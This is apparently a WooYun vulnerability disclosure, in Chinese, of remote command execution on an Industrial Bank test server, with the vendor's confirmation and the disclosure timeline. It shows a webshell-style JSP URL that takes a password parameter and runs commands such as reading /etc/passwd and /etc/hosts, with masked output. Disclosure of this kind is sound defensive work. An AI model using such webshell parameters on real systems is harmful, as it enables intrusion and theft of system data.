金融安全之兴业银行某站命令导致getshell

编号213455
Urlhttp://www.wooyun.org/bug.php?action=view&id=213455
漏洞状态厂商已经确认
漏洞标题金融安全之兴业银行某站命令导致getshell
漏洞类型命令执行
厂商cib.com.cn
白帽子路人甲
提交日期2016-05-27 15:09:00
公开日期2016-07-11 18:00:00
修复时间(not set)
确认时间2016-05-27 00:00:00
Confirm Spend0
漏洞标签远程命令执行
关注数0
收藏数0
白帽评级
白帽自评rank18
厂商评级
厂商评rank2
漏洞简介
论插件的重要性
写了一个插件,投tangscan已重复,自己写了个脚本遍历了很多大公司的网站,然后批量去测试该插件的命中率。刚好发现该银行有这个漏洞...
插件还在跑,等找到漏洞了继续提交吧
漏洞细节

233.png


mask 区域
1.http://**.**.**/  漏洞地址_
**********
2.http://**.**.**/1.jsppwd=023&i=ifconfig_
**********
*****et HWaddr 00:*****
***** Bcast:168.3.23.2*****
*****50:56ff:feaa:73*****
*****G MULTICAST MT*****
*****errors:0 dropped*****
*****rors:0 dropped:0 *****
*****s:0 txqueu*****
*****3 GiB) TX bytes:2*****
**********
*****cap:Local*****
*****27.0.0.1 M*****
*****r: ::1/128*****
*****UNNING MTU:*****
*****rors:0 dropped:*****
*****rs:0 dropped:0 o*****
*****ons:0 txq*****
*****.3 MiB) TX byt*****
**********
**********
**********
3.http://**.**.**/1.jsppwd=023&i=cat%20/etc/passwd_
**********
*****:/root:/*****
*****bin:/sbi*****
*****:/sbin:/sb*****
*****r/adm:/sb*****
*****ool/lpd:/s*****
*****:/sbin:/*****
*****wn:/sbin:/s*****
*****:/sbin:/*****
*****/spool/mail*****
*****spool/uucp:/*****
*****tor:/root:/*****
*****/usr/games:*****
*****var/gopher:/*****
*****/var/ftp:/s*****
*****body:/:/s*****
*****sage bus:/:/*****
*****muxd user:/*****
*****memory owner:/d*****
*****/var/cache/rpc*****
*****eKit:/proc:/*****
*****Stack:/var/lib/avah*****
*****c/abrt:/sb*****
***** daemon:/:/*****
***** User:/var/lib*****
***** NFS User:/var/li*****
*****ib/gdm:/sb*****
*****/ntp:/sbi*****
*****:/var/www:/*****
*****r":/var/empty/*****
*****pool/postfix*****
*****ver:/var/lib*****
***** Daemon:/var/run/*****
*****t:/home/xgu*****
*****r:/home/sabayo*****
*****d SSH:/var/empty*****
*****::/:/sbi*****
*****be used by OProfile:/*****
*****ome/dev:/*****
*****home/zabbi*****
*****/ucp/cib*****
**********
**********
**********
4.http://**.**.**/1.jsppwd=023&i=cat%20/etc/hosts_
**********
*****domain localhost4 l*****
*****domain localhost6 l*****
*****9 name*****
*****0 data*****
*****5 UCP-*****
**********
*****ATALK UAT-*****
*****5 UAT*****
*****9 UAT*****

POC

修复方案

补丁

状态信息 2016-05-27: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已经确认,细节仅向厂商公开
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开
厂商回复该漏洞为测试系统漏洞,暂未涉及业务数据。
回应信息危害等级:低漏洞Rank:2 确认时间:2016-05-27 17:50
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

恶意给分 投诉

几何黑店02016-05-28 09:38:00

恶意给分 投诉

xsser02016-05-27 20:50:00